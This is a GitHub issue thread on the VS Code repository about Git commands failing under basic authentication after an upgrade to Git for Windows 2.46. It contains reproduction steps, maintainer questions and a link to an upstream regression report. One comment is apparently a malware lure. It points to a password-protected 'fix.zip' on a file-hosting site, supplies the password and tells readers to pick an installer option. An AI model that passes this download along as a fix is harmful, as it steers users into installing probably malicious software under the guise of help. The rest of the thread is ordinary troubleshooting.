### ISSUE TITLE
Git commands inside vscode fail when using basic authentication

### ISSUE THREAD

**Issue by isaacag** [microsoft/vscode#227032]
Does this issue occur when all extensions are disabled?: Yes

- VS Code Version: 1.92.2
- OS Version: Windows 10 Pro 22H2

Steps to Reproduce:

1. Install Git for Windows latest version (2.46)
2. Disable credential manager support `git config --system --unset credential.helper`
3. Open vscode and a terminal inside vscode
4. Run `git pull` from a repository that requires authentication

Expected behavior:

At 4 after two vscode popups for user and password git command is executed

Actual behavior:

At 4 after two vscode popups for user and password, terminal shows...
fatal: read error: Invalid argument
fatal: expected flush after ref listing

Notes

Downgrading to Git 2.45 fixes the problem.
Error is not reproducible on terminals outside vscode (powershell, cmd, git bash) or when windows credential manager integration is active.

**Comment by africanobyamugisha** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by lszomoru** [comment]
Thanks for filing this issue. Couple of questions:
1. Could you please provide the screenshot of the two VS Code popups shown at step 4.
2. Since downgrading Git resolves the problem this seems to indicate an issue with Git and not VS code. Could it be that what resolves the problem is the fact that you are reinstalling Git rather than the fact that you are downgrading Git? Have you filed an issue in the Git for Windows [repo](https://github.com/git-for-windows/git/issues) so that they look at this?

**Comment by isaacag** [comment]
1. These are the screenshots.
![image](https://github.com/user-attachments/assets/a86943e6-c8d3-42ce-b9a6-9efd42fb5937)
![image](https://github.com/user-attachments/assets/d527d190-81c5-48f8-beeb-a39abc1156f0)
2. I do not think that the re-install is fixing the problem, we also did this the other way (old version to latest version) and the problem started in all repositories. I will rise an issue on the Git side but since this only happens inside vscode is unlikely that they will see it as a problem.

**Comment by lszomoru** [comment]
>  I will rise an issue on the Git side but since this only happens inside vscode is unlikely that they will see it as a problem.

Thanks! As we have not changed anything on our side, there seems to be a behaviour change in git that we might have to react to.
The Git for Windows team should confirm that the behaviour change was intended and hopefully provide guidance on how to react to it.

**Comment by isaacag** [comment]
https://github.com/git-for-windows/git/issues/5115

**Comment by lszomoru** [comment]
Thank you! Looking at the issue it seems to be a regression. Subscribed to the issue.
